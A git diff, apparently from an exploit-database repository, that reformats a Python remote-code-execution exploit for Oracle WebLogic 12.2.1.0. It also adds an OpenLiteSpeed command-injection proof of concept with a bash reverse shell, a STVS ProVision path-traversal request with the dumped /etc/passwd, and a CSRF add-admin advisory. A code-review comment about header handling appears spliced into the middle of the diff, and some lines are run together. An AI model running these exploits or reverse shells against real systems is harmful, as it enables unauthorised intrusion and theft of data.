diff --git a/exploits/java/webapps/49479.py b/exploits/java/webapps/49479.py
index b577bccdf..bc4691b9d 100755
--- a/exploits/java/webapps/49479.py
+++ b/exploits/java/webapps/49479.py
@@ -1,6 +1,6 @@
 # Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
-# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\"
-# Date: 25/1/2021
+# Google Dork: inurl:"/console/login/LoginForm.jsp"
+# Date: 01/26/2021
 # Exploit Author: CHackA0101
 # Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
 # Version: Oracle WebLogic Server, version 12.2.1.0
@@ -15,77 +15,74 @@ import requests import argparse import http.client -http.client.HTTPConnection._http_vsn = 10 -http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\' +http.client.HTTPConnection._http_vsn=10 +http.client.HTTPConnection._http_vsn_str='HTTP/1.0' +parse=argparse.ArgumentParser() +parse.add_argument('-u','--url',help='url') +args=parse.parse_args() -parse = argparse.ArgumentParser() -parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\') -args = parse.parse_args() - -proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'} -cmd_ = \\\"\\\" +proxies={'http':'127.0.0.1:8080'} +cmd_="" # Headers headers = { - \\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\", - \\\"Accept\\\": \\\"application/json, text/plain, */*\\\", - \\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\", - \\\"Accept-Encoding\\\": \\\"gzip, deflate\\\", - \\\"Upgrade-Insecure-Requests\\\": \\\"1\\\", - \\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\", - \\\"Cache-Control\\\": \\\"max-age=0\\\", - \\\"Connection\\\": \\\"close\\\" + "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0", + "Accept":"application/json,text/plain,*/*", + "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding":"gzip,deflate", + "Upgrade-Insecure-Requests":"1", + "Content-Type":"application/x-www-form-urlencoded", + "Cache-Control":"max-age=0", + "Connection":"close" } # Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation: -url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\" -url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\" 
+url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");""" +url_=args.url+"/console/images/%252E%252E%252Fconsole.portal" -form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); +form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); -java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\"); +java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); -weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj); -String cmd = req.getHeader(\\\"cmd\\\"); -String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd}; +weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); +String cmd = req.getHeader("cmd"); +String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd}; if (cmd != null) { - String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next(); - weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req); + String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next(); + weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); - res.getWriter().write(\\\"\\\"); -}executeThread.interrupt(); -\\\");\\\"\\\"\\\" + res.getWriter().write("");}executeThread.interrupt();");""" #data_ = parse.urlencode(form_data_) -results1 = requests.get(url, headers=headers) +results1=requests.get(url,headers=headers) -if results1.status_code == 200: - print(\\\"(Load Headers... \\\\n\\\") - print(\\\"(Data urlencode... \\\\n\\\") - print(\\\"(Execute exploit... 
\\\\n\\\") - print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\") +if results1.status_code==200: + print("(Load Headers...)\n") + print("(Data urlencode...)\n") + print("(Execute exploit...)\n") + print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n") while True: - cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\") - if cmd_test == \\\"exit\\\": + cmd_test = input("(CHackA0101GNU/Linux)$ ") + if cmd_test=="exit": break else: try: cmd_ = cmd_test headers = { - \\\'cmd\\\': cmd_, - \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\', - \\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\', - \\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\', - \\\'Connection\\\': \\\'close\\\', - \\\'Accept-Encoding\\\': \\\'gzip, deflate\\\', - \\\'Content-Length\\\': \\\'1244\\\', - \\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\' + 'cmd': cmd_, + 'Content-Type':'application/x-www-form-urlencoded', + 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36', + 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', + 'Connection':'close', + 'Accept-Encoding':'gzip,deflate', + 'Content-Length':'1244', + 'Content-Type':'application/x-www-form-urlencoded' } results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text print(results_) except: pass else: - print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\") \ No newline at end of file + print("(CHackA0101-GNU/Linux)$ Fail.\n") \ No newline at end of file diff --git a/exploits/multiple/webapps/49483.txt b/exploits/multiple/webapps/49483.txt new file mode 100644 index 000000000..e1dd5cd8b --- /dev/null 
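Review bot: The `headers` literal rebuilt inside the `while` loop on the new side lists `'Content-Type'` twice, so the second entry silently overwrites the first; drop one of them. The same literal hard-codes `'Content-Length': '1244'`, which `requests` already derives from `data=` and which will not match any other `form_data_` length, so that line should go as well. `proxies={'http':'127.0.0.1:8080'}` is assigned on the new side but never passed to any request, leaving it as dead code. This is a flat script with no enclosing function; the header lines 1–14 of the file lie outside this hunk.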
+++ b/exploits/multiple/webapps/49483.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
+# Date: 26/1/2021
+# Exploit Author: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+# Tested on Windows 10
+
+
+Step 1: Log in to the dashboard using the Administrator account.
+Step 2 : Access Server Configuration > External App > Command
+Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
+Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
+Step 5: Graceful Restart
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: target:7080
+Connection: close
+Content-Length: 579
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://target:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
+LSPA37FE0C43B84483E0=excYiZbpUS4%3D
+
+name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock¬e=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
\ No newline 
at end of file
diff --git a/exploits/ruby/webapps/49481.txt b/exploits/ruby/webapps/49481.txt
new file mode 100644
index 000000000..500fedc0c
--- /dev/null
+++ b/exploits/ruby/webapps/49481.txt
@@ -0,0 +1,121 @@ +# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated) +# Date: 19.01.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.stvs.ch + + +STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability + + +Vendor: STVS SA +Product web page: http://www.stvs.ch +Platform: Ruby +Affected version: 5.9.10 (build 2885-3a8219a) + 5.9.9 (build 2882-7c3b787) + 5.9.7 (build 2871-a450938) + 5.9.1 (build 2771-1bbed11) + 5.9.0 (build 2701-6123026) + 5.8.6 (build 2557-84726f7) + 5.7 + 5.6 + 5.5 + +Summary: STVS is a Swiss company specializing in development of +software for digital video recording for surveillance cameras +as well as the establishment of powerful and user-friendly IP +video surveillance networks. + +Desc: The NVR software ProVision suffers from an authenticated +arbitrary file disclosure vulnerability. Input passed through +the files parameter in archive download script (archive.rb) is +not properly verified before being used to download files. This +can be exploited to disclose the contents of arbitrary and sensitive +files. 
+ +Tested on: Ubuntu 14.04.3 + nginx/1.12.1 + nginx/1.4.6 + nginx/1.1.19 + nginx/0.7.65 + nginx/0.3.61 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5623 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php + +19.01.2021 + +-- + + +#1 LFI Prober (FP): +------------------- + +GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 +Host: 192.168.1.17 +Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80" +Accept: application/json, text/javascript, */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Origin: http://192.168.1.17 +Referer: http://192.168.1.17/archive +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: last_stream=1; __flash__info= +Connection: close + +HTTP/1.1 500 Not Found +Server: nginx/1.4.6 (Ubuntu) +Date: Mon, 18 Jan 2021 23:23:30 GMT +Content-Type: text/html +Content-Length: 2727 +Connection: close + +

`Archive` application problem

Archive::Controllers::FileDownload.GET

TypeError can't convert nil into String:

+ + +#2 LFI Prober (Verified): +------------------------- + +$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd" + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +libuuid:x:100:101::/var/lib/libuuid: +syslog:x:101:104::/home/syslog:/bin/false +mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false +provision:x:999:107::/srv/provision/provision:/bin/bash +stvs:x:1000:100::/home/stvs:/bin/bash +usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false +ntp:x:104:108::/home/ntp:/bin/false +messagebus:x:105:110::/var/run/dbus:/bin/false +sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin +statd:x:107:65534::/var/lib/nfs:/bin/false + + +-- +Errno::ENOENT No such file or directory - /var/www/index.html: + + /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize' + /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new' + /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get' \ No newline at end of file diff --git a/exploits/ruby/webapps/49482.html b/exploits/ruby/webapps/49482.html new file mode 100644 index 000000000..7241490c7 --- /dev/null +++ b/exploits/ruby/webapps/49482.html 
@@ -0,0 +1,66 @@ +# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin) +# Date: 19.01.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.stvs.ch + +STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin) + + +Vendor: STVS SA +Product web page: http://www.stvs.ch +Platform: Ruby +Affected version: 5.9.10 (build 2885-3a8219a) + 5.9.9 (build 2882-7c3b787) + 5.9.7 (build 2871-a450938) + 5.9.1 (build 2771-1bbed11) + 5.9.0 (build 2701-6123026) + 5.8.6 (build 2557-84726f7) + 5.7 + 5.6 + 5.5 + +Summary: STVS is a Swiss company specializing in development of +software for digital video recording for surveillance cameras +as well as the establishment of powerful and user-friendly IP +video surveillance networks. + +Desc: The application interface allows users to perform certain +actions via HTTP requests without performing any validity checks +to verify the requests. This can be exploited to perform certain +actions with administrative privileges if a logged-in user visits +a malicious web site. + +Tested on: Ubuntu 14.04.3 + nginx/1.12.1 + nginx/1.4.6 + nginx/1.1.19 + nginx/0.7.65 + nginx/0.3.61 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5625 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php + +19.01.2021 + +-- + + + + +
+ + + + + + + + +
+ + \ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f31de1c62..5ffa51ea8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43674,3 +43674,6 @@ id,file,description,date,author,type,platform,port
 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
+49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,